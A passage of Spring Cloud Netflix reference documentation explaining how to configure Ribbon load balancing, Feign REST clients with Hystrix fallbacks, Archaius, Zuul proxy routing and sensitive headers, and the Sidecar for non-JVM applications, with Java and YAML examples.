has a name that\nyou give it as an application developer (e.g. using the `@FeignClient`\nannotation). Spring Cloud creates a new ensemble as an\n`ApplicationContext` on demand for each named client using\n`RibbonClientConfiguration`. This contains (amongst other things) an\n`ILoadBalancer`, a `RestClient`, and a `ServerListFilter`.\n\n=== Customizing the Ribbon Client\n\nYou can configure some bits of a Ribbon client using external\nproperties in `<client>.ribbon.*`, which is no different than using\nthe Netflix APIs natively, except that you can use Spring Boot\nconfiguration files. The native options can\nbe inspected as static fields in `CommonClientConfigKey` (part of\nribbon-core).\n\nSpring Cloud also lets you take full control of the client by\ndeclaring additional configuration (on top of the\n`RibbonClientConfiguration`) using `@RibbonClient`. Example:\n\n[source,java,indent=0]\n----\n@Configuration\n@RibbonClient(name = \"foo\", configuration = FooConfiguration.class)\npublic class TestConfiguration {\n}\n----\n\nIn this case the client is composed from the components already in\n`RibbonClientConfiguration` together with any in `FooConfiguration`\n(where the latter generally will override the former).\n\nWARNING: The `FooConfiguration` has to be `@Configuration` but take\ncare that it is not in a `@ComponentScan` for the main application\ncontext, otherwise it will be shared by all the `@RibbonClients`. If\nyou use `@ComponentScan` (or `@SpringBootApplication`) you need to\ntake steps to avoid it being included (for instance put it in a\nseparate, non-overlapping package, or specify the packages to scan\nexplicitly in the `@ComponentScan`).\n\nSpring Cloud Netflix provides the following beans by default for ribbon\n(`BeanType` beanName: `ClassName`):\n\n* `IClientConfig` ribbonClientConfig: `DefaultClientConfigImpl`\n* `IRule` ribbonRule: `ZoneAvoidanceRule`\n* `IPing` ribbonPing: `NoOpPing`\n* `ServerList<Server>` ribbonServerList: `ConfigurationBasedServerList`\n* `ServerListFilter<Server>` ribbonServerListFilter: `ZonePreferenceServerListFilter`\n* `ILoadBalancer` ribbonLoadBalancer: `ZoneAwareLoadBalancer`\n\nCreating a bean of one of those type and placing it in a `@RibbonClient`\nconfiguration (such as `FooConfiguration` above) allows you to override each\none of the beans described. Example:\n\n[source,java,indent=0]\n----\n@Configuration\npublic class FooConfiguration {\n @Bean\n public IPing ribbonPing(IClientConfig config) {\n return new PingUrl();\n }\n}\n----\n\nThis replaces the `NoOpPing` with `PingUrl`.\n\n=== Using Ribbon with Eureka\n\nWhen Eureka is used in conjunction with Ribbon the `ribbonServerList`\nis overridden with an extension of `DiscoveryEnabledNIWSServerList`\nwhich populates the list of servers from Eureka. It also replaces the\n`IPing` interface with `NIWSDiscoveryPing` which delegates to Eureka\nto determine if a server is up. The `ServerList` that is installed by\ndefault is a `DomainExtractingServerList` and the purpose of this is\nto make physical metadata available to the load balancer without using\nAWS AMI metadata (which is what Netflix relies on). By default the\nserver list will be constructed with \"zone\" information as provided in\nthe instance metadata (so on the remote clients set\n`eureka.instance.metadataMap.zone`), and if that is missing it can use\nthe domain name from the server hostname as a proxy for zone (if the\nflag `approximateZoneFromHostname` is set). Once the zone information\nis available it can be used in a `ServerListFilter`. By default it\nwill be used to locate a server in the same zone as the client because\nthe default is a `ZonePreferenceServerListFilter`. The zone of the\nclient is determined the same way as the remote instances by default,\ni.e. via `eureka.instance.metadataMap.zone`.\n\nNOTE: The orthodox \"archaius\" way to set the client zone is via a\nconfiguration property called \"@zone\", and Spring Cloud will use that\nin preference to all other settings if it is available (note that the\nkey will have to be quoted in YAML configuration).\n\nNOTE: If there is no other source of zone data then a guess is made\nbased on the client configuration (as opposed to the instance\nconfiguration). We take `eureka.client.availabilityZones`, which is a\nmap from region name to a list of zones, and pull out the first zone\nfor the instance's own region (i.e. the `eureka.client.region`, which\ndefaults to \"us-east-1\" for comatibility with native Netflix).\n\n[[spring-cloud-ribbon-without-eureka]]\n=== Example: How to Use Ribbon Without Eureka\n\nEureka is a convenient way to abstract the discovery of remote servers\nso you don't have to hard code their URLs in clients, but if you\nprefer not to use it, Ribbon and Feign are still quite\namenable. Suppose you have declared a `@RibbonClient` for \"stores\",\nand Eureka is not in use (and not even on the classpath). The Ribbon\nclient defaults to a configured server list, and you can supply the\nconfiguration like this\n\n.application.yml\n----\nstores:\n ribbon:\n listOfServers: example.com,google.com\n----\n\n=== Example: Disable Eureka use in Ribbon\n\nSetting the property `ribbon.eureka.enabled = false` will explicitly\ndisable the use of Eureka in Ribbon.\n\n.application.yml\n----\nribbon:\n eureka:\n enabled: false\n----\n\n=== Using the Ribbon API Directly\n\nYou can also use the `LoadBalancerClient` directly. Example:\n\n[source,java,indent=0]\n----\npublic class MyClass {\n @Autowired\n private LoadBalancerClient loadBalancer;\n\n public void doStuff() {\n ServiceInstance instance = loadBalancer.choose(\"stores\");\n URI storesUri = URI.create(String.format(\"http:\/\/%s:%s\", instance.getHost(), instance.getPort()));\n \/\/ ... do something with the URI\n }\n}\n----\n\n[[spring-cloud-feign]]\n== Declarative REST Client: Feign\n\nhttps:\/\/github.com\/Netflix\/feign[Feign] is a declarative web service client. It makes writing web service clients easier. To use Feign create an interface and annotate it. It has pluggable annotation support including Feign annotations and JAX-RS annotations. Feign also supports pluggable encoders and decoders. Spring Cloud adds support for Spring MVC annotations and for using the same `HttpMessageConverters` used by default in Spring Web. Spring Cloud integrates Ribbon and Eureka to provide a load balanced http client when using Feign.\n\nExample spring boot app\n\n[source,java,indent=0]\n----\n@Configuration\n@ComponentScan\n@EnableAutoConfiguration\n@EnableEurekaClient\n@EnableFeignClients\npublic class Application {\n\n public static void main(String[] args) {\n SpringApplication.run(Application.class, args);\n }\n\n}\n----\n\n.StoreClient.java\n[source,java,indent=0]\n----\n@FeignClient(\"stores\")\npublic interface StoreClient {\n @RequestMapping(method = RequestMethod.GET, value = \"\/stores\")\n List<Store> getStores();\n\n @RequestMapping(method = RequestMethod.POST, value = \"\/stores\/{storeId}\", consumes = \"application\/json\")\n Store update(@PathVariable(\"storeId\") Long storeId, Store store);\n}\n----\n\nIn the `@FeignClient` annotation the String value (\"stores\" above) is\nan arbitrary client name, which is used to create a Ribbon load\nbalancer (see <<spring-cloud-ribbon,below for details of Ribbon\nsupport>>). You can also specify a URL using the `url` attribute\n(absolute value or just a hostname). The name of the bean in the application context is the fully qualified name of the interface. An alias is also created which is the 'name' attribute plus 'FeignClient'. For the example above, `@Qualifier(\"storesFeignClient\")` could be used to reference the bean.\n\nThe Ribbon client above will want to discover the physical addresses\nfor the \"stores\" service. If your application is a Eureka client then\nit will resolve the service in the Eureka service registry. If you\ndon't want to use Eureka, you can simply configure a list of servers\nin your external configuration (see\n<<spring-cloud-ribbon-without-eureka,above for example>>).\n\n[[spring-cloud-feign-overriding-defaults]]\n=== Overriding Feign Defaults\n\nA central concept in Spring Cloud's Feign support is that of the named client. Each feign client is part of an ensemble of components that work together to contact a remote server on demand, and the ensemble has a name that you give it as an application developer using the `@FeignClient` annotation. Spring Cloud creates a new ensemble as an\n`ApplicationContext` on demand for each named client using `FeignClientsConfiguration`. This contains (amongst other things) an `feign.Decoder`, a `feign.Encoder`, and a `feign.Contract`.\n\nSpring Cloud lets you take full control of the feign client by declaring additional configuration (on top of the `FeignClientsConfiguration`) using `@FeignClient`. Example:\n\n[source,java,indent=0]\n----\n@FeignClient(name = \"stores\", configuration = FooConfiguration.class)\npublic interface StoreClient {\n \/\/..\n}\n----\n\nIn this case the client is composed from the components already in `FeignClientsConfiguration` together with any in `FooConfiguration` (where the latter will override the former).\n\nWARNING: The `FooConfiguration` has to be `@Configuration` but take care that it is not in a `@ComponentScan` for the main application context, otherwise it will be used for every `@FeignClient`. If you use `@ComponentScan` (or `@SpringBootApplication`) you need to take steps to avoid it being included (for instance put it in a separate, non-overlapping package, or specify the packages to scan explicitly in the `@ComponentScan`).\n\nNOTE: The `serviceId` attribute is now deprecated in favor of the `name` attribute.\n\nWARNING: Previously, using the `url` attribute, did not require the `name` attribute. Using `name` is now required.\n\nPlaceholders are supported in the `name` and `url` attributes.\n\n[source,java,indent=0]\n----\n@FeignClient(name = \"${feign.name}\", url = \"${feign.url}\")\npublic interface StoreClient {\n \/\/..\n}\n----\n\nSpring Cloud Netflix provides the following beans by default for feign (`BeanType` beanName: `ClassName`):\n\n* `Decoder` feignDecoder: `ResponseEntityDecoder` (which wraps a `SpringDecoder`)\n* `Encoder` feignEncoder: `SpringEncoder`\n* `Logger` feignLogger: `Slf4jLogger`\n* `Contract` feignContract: `SpringMvcContract`\n* `Feign.Builder` feignBuilder: `HystrixFeign.Builder`\n\nSpring Cloud Netflix _does not_ provide the following beans by default for feign, but still looks up beans of these types from the application context to create the feign client:\n\n* `Logger.Level`\n* `Retryer`\n* `ErrorDecoder`\n* `Request.Options`\n* `Collection<RequestInterceptor>`\n\nCreating a bean of one of those type and placing it in a `@FeignClient` configuration (such as `FooConfiguration` above) allows you to override each one of the beans described. Example:\n\n[source,java,indent=0]\n----\n@Configuration\npublic class FooConfiguration {\n @Bean\n public Contract feignContract() {\n return new feign.Contract.Default();\n }\n\n @Bean\n public BasicAuthRequestInterceptor basicAuthRequestInterceptor() {\n return new BasicAuthRequestInterceptor(\"user\", \"password\");\n }\n}\n----\n\nThis replaces the `SpringMvcContract` with `feign.Contract.Default` and adds a `RequestInterceptor` to the collection of `RequestInterceptor`.\n\nDefault configurations can be specified in the `@EnableFeignClients` attribute `defaultConfiguration` in a similar manner as described above. The difference is that this configuration will apply to _all_ feign clients.\n\n[[spring-cloud-feign-hystrix]]\n=== Feign Hystrix Support\n\nIf Hystrix is on the classpath, by default Feign will wrap all methods with a circuit breaker. Returning a `com.netflix.hystrix.HystrixCommand` is also available. This lets you use reactive patterns (with a call to `.toObservable()` or `.observe()` or asynchronous use (with a call to `.queue()`).\n\nTo disable Hystrix support for Feign, set `feign.hystrix.enabled=false`.\n\nTo disable Hystrix support on a per-client basis create a vanilla `Feign.Builder` with the \"prototype\" scope, e.g.:\n\n[source,java,indent=0]\n----\n@Configuration\npublic class FooConfiguration {\n @Bean\n\t@Scope(\"prototype\")\n\tpublic Feign.Builder feignBuilder() {\n\t\treturn Feign.builder();\n\t}\n}\n----\n\n[[spring-cloud-feign-hystrix-fallback]]\n=== Feign Hystrix Fallbacks\n\nHystrix supports the notion of a fallback: a default code path that is executed when they circuit is open or there is an error. To enable fallbacks for a given `@FeignClient` set the `fallback` attribute to the class name that implements the fallback.\n\n[source,java,indent=0]\n----\n@FeignClient(name = \"hello\", fallback = HystrixClientFallback.class)\nprotected interface HystrixClient {\n @RequestMapping(method = RequestMethod.GET, value = \"\/hello\")\n Hello iFailSometimes();\n}\n\nstatic class HystrixClientFallback implements HystrixClient {\n @Override\n public Hello iFailSometimes() {\n return new Hello(\"fallback\");\n }\n}\n----\n\nWARNING: There is a limitation with the implementation of fallbacks in Feign and how Hystrix fallbacks work. Fallbacks are currently not supported for methods that return `com.netflix.hystrix.HystrixCommand` and `rx.Observable`.\n\n[[spring-cloud-feign-inheritance]]\n=== Feign Inheritance Support\n\nFeign supports boilerplate apis via single-inheritance interfaces.\nThis allows grouping common operations into convenient base interfaces.\n\n.UserService.java\n[source,java,indent=0]\n----\npublic interface UserService {\n\n @RequestMapping(method = RequestMethod.GET, value =\"\/users\/{id}\")\n User getUser(@PathVariable(\"id\") long id);\n}\n----\n\n.UserResource.java\n[source,java,indent=0]\n----\n@RestController\npublic class UserResource implements UserService {\n\n}\n----\n\n.UserClient.java\n[source,java,indent=0]\n----\npackage project.user;\n\n@FeignClient(\"users\")\npublic interface UserClient extends UserService {\n\n}\n----\n\nNOTE: It is generally not advisable to share an interface between a\nserver and a client. It introduces tight coupling, and also actually\ndoesn't work with Spring MVC in its current form (method parameter\nmapping is not inherited).\n\n=== Feign request\/response compression\n\nYou may consider enabling the request or response GZIP compression for your\nFeign requests. You can do this by enabling one of the properties:\n\n[source,java]\n----\nfeign.compression.request.enabled=true\nfeign.compression.response.enabled=true\n----\n\nFeign request compression gives you settings similar to what you may set for your web server:\n\n[source,java]\n----\nfeign.compression.request.enabled=true\nfeign.compression.request.mime-types=text\/xml,application\/xml,application\/json\nfeign.compression.request.min-request-size=2048\n----\n\nThese properties allow you to be selective about the compressed media types and minimum request threshold length.\n\n=== Feign logging\n\nA logger is created for each Feign client created. By default the name of the logger is the full class name of the interface used to create the Feign client. Feign logging only responds to the `DEBUG` level.\n\n.application.yml\n\n[source,yaml]\n----\nlogging.level.project.user.UserClient: DEBUG\n----\n\nThe `Logger.Level` object that you may configure per client, tells Feign how much to log. Choices are:\n\n* `NONE`, No logging (*DEFAULT*).\n* `BASIC`, Log only the request method and URL and the response status code and execution time.\n* `HEADERS`, Log the basic information along with request and response headers.\n* `FULL`, Log the headers, body, and metadata for both requests and responses.\n\nFor example, the following would set the `Logger.Level` to `FULL`:\n\n[source,java,indent=0]\n----\n@Configuration\npublic class FooConfiguration {\n @Bean\n Logger.Level feignLoggerLevel() {\n return Logger.Level.FULL;\n }\n}\n----\n\n== External Configuration: Archaius\n\nhttps:\/\/github.com\/Netflix\/archaius[Archaius] is the Netflix client side configuration library. It is the library used by all of the Netflix OSS components for configuration. Archaius is an extension of the http:\/\/commons.apache.org\/proper\/commons-configuration[Apache Commons Configuration] project. It allows updates to configuration by either polling a source for changes or for a source to push changes to the client. Archaius uses Dynamic<Type>Property classes as handles to properties.\n\n.Archaius Example\n[source,java]\n----\nclass ArchaiusTest {\n DynamicStringProperty myprop = DynamicPropertyFactory\n .getInstance()\n .getStringProperty(\"my.prop\");\n\n void doSomething() {\n OtherClass.someMethod(myprop.get());\n }\n}\n----\n\nArchaius has its own set of configuration files and loading priorities. Spring applications should generally not use Archaius directly, but the need to configure the Netflix tools natively remains. Spring Cloud has a Spring Environment Bridge so Archaius can read properties from the Spring Environment. This allows Spring Boot projects to use the normal configuration toolchain, while allowing them to configure the Netflix tools, for the most part, as documented.\n\n== Router and Filter: Zuul\n\nRouting in an integral part of a microservice architecture. For example, `\/` may be mapped to your web application, `\/api\/users` is mapped to the user service and `\/api\/shop` is mapped to the shop service. https:\/\/github.com\/Netflix\/zuul[Zuul] is a JVM based router and server side load balancer by Netflix.\n\nhttp:\/\/www.slideshare.net\/MikeyCohen1\/edge-architecture-ieee-international-conference-on-cloud-engineering-32240146\/27[Netflix uses Zuul] for the following:\n\n* Authentication\n* Insights\n* Stress Testing\n* Canary Testing\n* Dynamic Routing\n* Service Migration\n* Load Shedding\n* Security\n* Static Response handling\n* Active\/Active traffic management\n\nZuul's rule engine allows rules and filters to be written in essentially any JVM language, with built in support for Java and Groovy.\n\nNOTE: The configuration property `zuul.max.host.connections` has been replaced by two new properties, `zuul.host.maxTotalConnections` and `zuul.host.maxPerRouteConnections` which default to 200 and 20 respectively.\n\n[[netflix-zuul-reverse-proxy]]\n=== Embedded Zuul Reverse Proxy\n\nSpring Cloud has created an embedded Zuul proxy to ease the\ndevelopment of a very common use case where a UI application wants to\nproxy calls to one or more back end services. This feature is useful\nfor a user interface to proxy to the backend services it requires,\navoiding the need to manage CORS and authentication concerns\nindependently for all the backends.\n\nTo enable it, annotate a Spring Boot main class with\n`@EnableZuulProxy`, and this forwards local calls to the appropriate\nservice. By convention, a service with the ID \"users\", will\nreceive requests from the proxy located at `\/users` (with the prefix\nstripped). The proxy uses Ribbon to locate an instance to forward to\nvia discovery, and all requests are executed in a hystrix command, so\nfailures will show up in Hystrix metrics, and once the circuit is open\nthe proxy will not try to contact the service.\n\nNOTE: the Zuul starter does not include a discovery client, so for\nroutes based on service IDs you need to provide one of those \non the classpath as well (e.g. Eureka is one choice).\n\nTo skip having a service automatically added, set\n`zuul.ignored-services` to a list of service id patterns. If a service\nmatches a pattern that is ignored, but also included in the explicitly\nconfigured routes map, then it will be unignored. Example:\n\n.application.yml\n[source,yaml]\n----\n zuul:\n ignoredServices: '*'\n routes:\n users: \/myusers\/**\n----\n\nIn this example, all services are ignored *except* \"users\".\n\nTo augment or change\nthe proxy routes, you can add external configuration like the\nfollowing:\n\n.application.yml\n[source,yaml]\n----\n zuul:\n routes:\n users: \/myusers\/**\n----\n\nThis means that http calls to \"\/myusers\" get forwarded to the \"users\"\nservice (for example \"\/myusers\/101\" is forwarded to \"\/101\").\n\nTo get more fine-grained control over a route you can specify the path\nand the serviceId independently:\n\n.application.yml\n[source,yaml]\n----\n zuul:\n routes:\n users:\n path: \/myusers\/**\n serviceId: users_service\n----\n\nThis means that http calls to \"\/myusers\" get forwarded to the\n\"users_service\" service. The route has to have a \"path\" which can be\nspecified as an ant-style pattern, so \"\/myusers\/{asterisk}\" only matches one\nlevel, but \"\/myusers\/{all}\" matches hierarchically.\n\nThe location of the backend can be specified as either a \"serviceId\"\n(for a service from discovery) or a \"url\" (for a physical location), e.g.\n\n.application.yml\n[source,yaml]\n----\n zuul:\n routes:\n users:\n path: \/myusers\/**\n url: http:\/\/example.com\/users_service\n----\n\nThese simple url-routes don't get executed as a `HystrixCommand` nor can you loadbalance multiple URLs with Ribbon.\nTo achieve this, specify a service-route and configure a Ribbon client for the\nserviceId (this currently requires disabling Eureka support in Ribbon:\nsee <<spring-cloud-ribbon-without-eureka,above for more information>>), e.g.\n\n.application.yml\n[source,yaml]\n----\nzuul:\n routes:\n users:\n path: \/myusers\/**\n serviceId: users\n\nribbon:\n eureka:\n enabled: false\n\nusers:\n ribbon:\n listOfServers: example.com,google.com\n----\n\nYou can provide convention between serviceId and routes using\nregexmapper. It uses regular expression named groups to extract\nvariables from serviceId and inject them into a route pattern.\n\n.ApplicationConfiguration.java\n[source,java]\n----\n@Bean\npublic PatternServiceRouteMapper serviceRouteMapper() {\n return new PatternServiceRouteMapper(\n \"(?<name>^.+)-(?<version>v.+$)\",\n \"${version}\/${name}\");\n}\n----\n\nThis means that a serviceId \"myusers-v1\" will be mapped to route\n\"\/v1\/myusers\/{all}\". Any regular expression is accepted but all named\ngroups must be present in both servicePattern and routePattern. If\nservicePattern does not match a serviceId, the default behavior is\nused. In the example above, a serviceId \"myusers\" will be mapped to route\n\"\/myusers\/{all}\" (no version detected) This feature is disable by\ndefault and only applies to discovered services.\n\nTo add a prefix to all mappings, set `zuul.prefix` to a value, such as\n`\/api`. The proxy prefix is stripped from the request before the\nrequest is forwarded by default (switch this behaviour off with\n`zuul.stripPrefix=false`). You can also switch off the stripping of\nthe service-specific prefix from individual routes, e.g.\n\n.application.yml\n[source,yaml]\n----\n zuul:\n routes:\n users:\n path: \/myusers\/**\n stripPrefix: false\n----\n\nIn this example, requests to \"\/myusers\/101\" will be forwarded to \"\/myusers\/101\" on the \"users\" service.\n\nThe `zuul.routes` entries actually bind to an object of type `ZuulProperties`. If you\nlook at the properties of that object you will see that it also has a \"retryable\" flag.\nSet that flag to \"true\" to have the Ribbon client automatically retry failed requests\n(and if you need to you can modify the parameters of the retry operations using\nthe Ribbon client configuration).\n\nThe `X-Forwarded-Host` header is added to the forwarded requests by\ndefault. To turn it off set `zuul.addProxyHeaders = false`. The\nprefix path is stripped by default, and the request to the backend\npicks up a header \"X-Forwarded-Prefix\" (\"\/myusers\" in the examples\nabove).\n\nAn application with `@EnableZuulProxy` could act as a standalone\nserver if you set a default route (\"\/\"), for example `zuul.route.home:\n\/` would route all traffic (i.e. \"\/{all}\") to the \"home\" service.\n\nIf more fine-grained ignoring is needed, you can specify specific patterns to ignore.\nThese patterns are evaluated at the start of the route location process, which\nmeans prefixes should be included in the pattern to warrant a match. Ignored patterns\nspan all services and supersede any other route specification.\n\n.application.yml\n[source,yaml]\n----\n zuul:\n ignoredPatterns: \/**\/admin\/**\n routes:\n users: \/myusers\/**\n----\n\nThis means that all calls such as \"\/myusers\/101\" will be forwarded to \"\/101\" on the \"users\" service.\nBut calls including \"\/admin\/\" will not resolve.\n\n=== Cookies and Sensitive Headers\n\nIt's OK to share headers between services in the same system, but you\nprobably don't want sensitive headers leaking downstream into external\nservers. You can specify a list of ignored headers as part of the\nroute configuration. Cookies play a special role because they have\nwell-defined semantics in browsers, and they are always to be treated\nas sensitive. If the consumer of your proxy is a browser, then cookies\nfor downstream services also cause problems for the user because they\nall get jumbled up (all downstream services look like they come from\nthe same place).\n\nIf you are careful with the design of your services, for example if\nonly one of the downstream services sets cookies, then you might be\nable to let them flow from the backend all the way up to the\ncaller. Also, if your proxy sets cookies and all your back end\nservices are part of the same system, it can be natural to simply\nshare them (and for instance use Spring Session to link them up to some\nshared state). Other than that, any cookies that get set by downstream\nservices are likely to be not very useful to the caller, so it is\nrecommended that you make (at least) \"Set-Cookie\" and \"Cookie\" into\nsensitive headers for routes that are not part of your domain. Even\nfor routes that *are* part of your domain, try to think carefully\nabout what it means before allowing cookies to flow between them and\nthe proxy.\n\nThe sensitive headers can be configured as a comma-separated list per\nroute, e.g.\n\n.application.yml\n[source,yaml]\n----\n zuul:\n routes:\n users:\n path: \/myusers\/**\n sensitiveHeaders: Cookie,Set-Cookie,Authorization\n url: https:\/\/downstream\n----\n\nSensitive headers can also be set globally by setting `zuul.sensitiveHeaders`. If `sensitiveHeaders` is set on a route, this will override the global `sensitiveHeaders` setting.\n\nNOTE: this is the default value for `sensitiveHeaders`, so you don't\nneed to set it unless you want it to be different. N.B. this is new in\nSpring Cloud Netflix 1.1 (in 1.0 the user had no control over headers\nand all cookies flow in both directions).\n\nIn addition to the per-route sensitive headers, you can set a global\nvalue for `zuul.ignoredHeaders` for values that should be discarded\n(both request and response) during interactions with downstream\nservices. By default these are empty, if Spring Security is not on the\nclasspath, and otherwise they are initialized to a set of well-known\n\"security\" headers (e.g. involving caching) as specified by Spring\nSecurity. The assumption in this case is that the downstream services\nmight add these headers too, and we want the values from the proxy.\n\n=== The Routes Endpoint\n\nIf you are using `@EnableZuulProxy` with tha Spring Boot Actuator you\nwill enable (by default) an additional endpoint, available via HTTP as\n`\/routes`. A GET to this endpoint will return a list of the mapped\nroutes. A POST will force a refresh of the existing routes (e.g. in\ncase there have been changes in the service catalog).\n\nNOTE: the routes should respond automatically to changes in the\nservice catalog, but the POST to \/routes is a way to force the change\nto happen immediately.\n\n=== Strangulation Patterns and Local Forwards\n\nA common pattern when migrating an existing application or API is to\n\"strangle\" old endpoints, slowly replacing them with different\nimplementations. The Zuul proxy is a useful tool for this because you\ncan use it to handle all traffic from clients of the old endpoints,\nbut redirect some of the requests to new ones.\n\nExample configuration:\n\n.application.yml\n[source,yaml]\n----\n zuul:\n routes:\n first:\n path: \/first\/**\n url: http:\/\/first.example.com\n second:\n path: \/second\/**\n url: forward:\/second\n third:\n path: \/third\/**\n url: forward:\/3rd\n legacy:\n path: \/**\n url: http:\/\/legacy.example.com\n----\n\nIn this example we are strangling the \"legacy\" app which is mapped to\nall requests that do not match one of the other patterns. Paths in\n`\/first\/{all}` have been extracted into a new service with an external\nURL. And paths in `\/second\/{all}` are forwared so they can be handled\nlocally, e.g. with a normal Spring `@RequestMapping`. Paths in\n`\/third\/{all}` are also forwarded, but with a different prefix\n(i.e. `\/third\/foo` is forwarded to `\/3rd\/foo`).\n\nNOTE: The ignored patterns aren't completely ignored, they just\naren't handled by the proxy (so they are also effectively forwarded\nlocally).\n\n=== Uploading Files through Zuul\n\nIf you `@EnableZuulProxy` you can use the proxy paths to\nupload files and it should just work as long as the files\nare small. For large files there is an alternative path\nwhich bypasses the Spring `DispatcherServlet` (to\navoid multipart processing) in \"\/zuul\/{asterisk}\". I.e. if\n`zuul.routes.customers=\/customers\/{all}` then you can\nPOST large files to \"\/zuul\/customers\/*\". The servlet\npath is externalized via `zuul.servletPath`. Extremely\nlarge files will also require elevated timeout settings\nif the proxy route takes you through a Ribbon load\nbalancer, e.g.\n\n.application.yml\n[source,yaml]\n----\nhystrix.command.default.execution.isolation.thread.timeoutInMilliseconds: 60000\nribbon:\n ConnectTimeout: 3000\n ReadTimeout: 60000\n----\n\nNote that for streaming to work with large files, you need to use chunked encoding in the request (which some browsers\ndo not do by default). E.g. on the command line:\n\n----\n$ curl -v -H \"Transfer-Encoding: chunked\" \\\n -F \"file=@mylarge.iso\" localhost:9999\/zuul\/simple\/file\n----\n\n=== Plain Embedded Zuul\n\nYou can also run a Zuul server without the proxying, or switch on parts of the proxying platform selectively, if you\nuse `@EnableZuulServer` (instead of `@EnableZuulProxy`). Any beans that you add to the application of type `ZuulFilter`\nwill be installed automatically, as they are with `@EnableZuulProxy`, but without any of the proxy filters being added\nautomatically.\n\nIn this case the routes into the Zuul server are still specified by\nconfiguring \"zuul.routes.{asterisk}\", but there is no service\ndiscovery and no proxying, so the \"serviceId\" and \"url\" settings are\nignored. For example:\n\n.application.yml\n[source,yaml]\n----\n zuul:\n routes:\n api: \/api\/**\n----\n\nmaps all paths in \"\/api\/{all}\" to the Zuul filter chain.\n\n=== Disable Zuul Filters\n\nZuul for Spring Cloud comes with a number of `ZuulFilter` beans enabled by default\nin both proxy and server mode. See https:\/\/github.com\/spring-cloud\/spring-cloud-netflix\/tree\/master\/spring-cloud-netflix-core\/src\/main\/java\/org\/springframework\/cloud\/netflix\/zuul\/filters[the zuul filters package] for the\npossible filters that are enabled. If you want to disable one, simply set\n`zuul.<SimpleClassName>.<filterType>.disable=true`. By convention, the package after\n`filters` is the Zuul filter type. For example to disable\n`org.springframework.cloud.netflix.zuul.filters.post.SendResponseFilter` set\n`zuul.SendResponseFilter.post.disable=true`.\n\n=== Polyglot support with Sidecar\n\nDo you have non-jvm languages you want to take advantage of Eureka, Ribbon and\nConfig Server? The Spring Cloud Netflix Sidecar was inspired by\nhttps:\/\/github.com\/Netflix\/Prana[Netflix Prana]. It includes a simple http api\nto get all of the instances (ie host and port) for a given service. You can\nalso proxy service calls through an embedded Zuul proxy which gets its route\nentries from Eureka. The Spring Cloud Config Server can be accessed directly\nvia host lookup or through the Zuul Proxy. The non-jvm app should implement\na health check so the Sidecar can report to eureka if the app is up or down.\n\nTo enable the Sidecar, create a Spring Boot application with `@EnableSidecar`.\nThis annotation includes `@EnableCircuitBreaker`, `@EnableDiscoveryClient`,\nand `@EnableZuulProxy`. Run the resulting application on the same host as the\nnon-jvm application.\n\nTo configure the side car add `sidecar.port` and `sidecar.health-uri` to `application.yml`.\nThe `sidecar.port` property is the port the non-jvm app is listening on. This\nis so the Sidecar can properly register the app with Eureka. The `sidecar.health-uri`\nis a uri accessible on the non-jvm app that mimicks a Spring Boot health\nindicator. It should return a json document like the following:\n\n.health-uri-document\n[source,json]\n----\n{\n \"status\":\"UP\"\n}\n----\n\nHere is an example application.yml for a Sidecar application:\n\n.application.yml\n[source,yaml]\n----\nserver:\n port: 5678\nspring:\n application:\n name: sidecar\n\nsidecar:\n port: 8000\n health-uri: http:\/\/localhost:8000\/health.json\n----\n\nThe api for the `DiscoveryClient.getInstances()` method is `\/hosts\/{serviceId}`.\nHere is an example response for `\/hosts\/customers` that returns two instances on\ndifferent hosts. This api is accessible to the non-jvm app (if the sidecar is\non port 5678) at `http:\/\/localhost:5678\/hosts\/{serviceId}`.\n\n.\/hosts\/customers\n[source,json]\n----\n[\n {\n \"host\": \"myhost\",\n \"port\": 9000,\n \"uri\": \"http:\/\/myhost:9000\",\n \"serviceId\": \"CUSTOMERS\",\n \"secure\": false\n },\n {\n \"host\": \"myhost2\",\n \"port\": 9000,\n \"uri\": \"http:\/\/myhost2:9000\",\n \"serviceId\": \"CUSTOMERS\",\n \"secure\": false\n }\n]\n----\n\nThe Zuul proxy automatically adds routes for each service known in eureka to\n`\/<serviceId>`, so the customers service is available at `\/customers`. The\nNon-jvm app can access the customer service via `http:\/\/localhost:5678\/customers`\n(assuming the sidecar is listening on port 5678).\n\nIf the Config Server is registered with Eureka, non-jvm application can access\nit via the Zuul proxy. If the serviceId of the ConfigServer is `configserver`\nand the Sidecar is on port 5678, then it can be accessed at\nhttp:\/\/localhost:5678\/configserver\n\nNon-jvm app can take advantage of the Config Server's ability to return YAML\ndocuments. For example, a call to http:\/\/sidecar.local.spring.io:5678\/configserver\/default-master.yml\nmight result in a YAML document like the following\n\n[source,yaml]\n----\neureka:\n client:\n serviceUrl:\n defaultZone: http:\/\/localhost:8761\/eureka\/\n password: password\ninfo:\n description: Spring Cloud Samples\n url: https:\/\/github.com\/spring-cloud-samples\n----\n\n[[netflix-rxjava-springmvc]]\n== RxJava with Spring MVC\nSpring Cloud Netflix includes the https:\/\/github.com\/ReactiveX\/RxJava[RxJava].\n\n> RxJava is a Java VM implementation of http:\/\/reactivex.io\/[Reactive Extensions]: a library for composing asynchronous and event-based programs by using observable sequences.\n\nSpring Cloud Netflix provides support for returning `rx.Single` objects from Spring MVC Controllers. It also supports using `rx.Observable` objects for https:\/\/en.wikipedia.org\/wiki\/Server-sent_events[Server-sent events (SSE)]. This can be very convenient if your internal APIs are already built using RxJava (see <<spring-cloud-feign-hystrix>> for examples).\n\nHere are some examples of using `rx.Single`:\n\n[source,java]\n----\ninclude::..\/..\/..\/..\/spring-cloud-netflix-core\/src\/test\/java\/org\/springframework\/cloud\/netflix\/rx\/SingleReturnValueHandlerTest.java[tags=rx_single,indent=0]\n----\n\nIf you have an `Observable`, rather than a single, you can use `.toSingle()` or `.toList().toSingle()`. Here are some examples:\n\n[source,java]\n----\ninclude::..\/..\/..\/..\/spring-cloud-netflix-core\/src\/test\/java\/org\/springframework\/cloud\/netflix\/rx\/ObservableReturnValueHandlerTest.java[tags=rx_observable,indent=0]\n----\n\nIf you have a streaming endpoint and client, SSE could be an option. To convert `rx.Observable` to a Spring `SseEmitter` use `RxResponse.sse()`. Here are some examples:\n\n[source,java]\n----\ninclude::..\/..\/..\/..\/spring-cloud-netflix-core\/src\/test\/java\/org\/springframework\/cloud\/netflix\/rx\/ObservableSseEmitterTest.java[tags=rx_observable_sse,indent=0]\n----\n\n[[netflix-metrics]]\n== Metrics: Spectator, Servo, and Atlas\n\nWhen used together, Spectator\/Servo and Atlas provide a near real-time operational insight platform.\n\nSpectator and Servo are Netflix's metrics collection libraries. Atlas is a Netflix metrics backend to manage dimensional time series data.\n\nServo served Netflix for several years and is still usable, but is gradually being 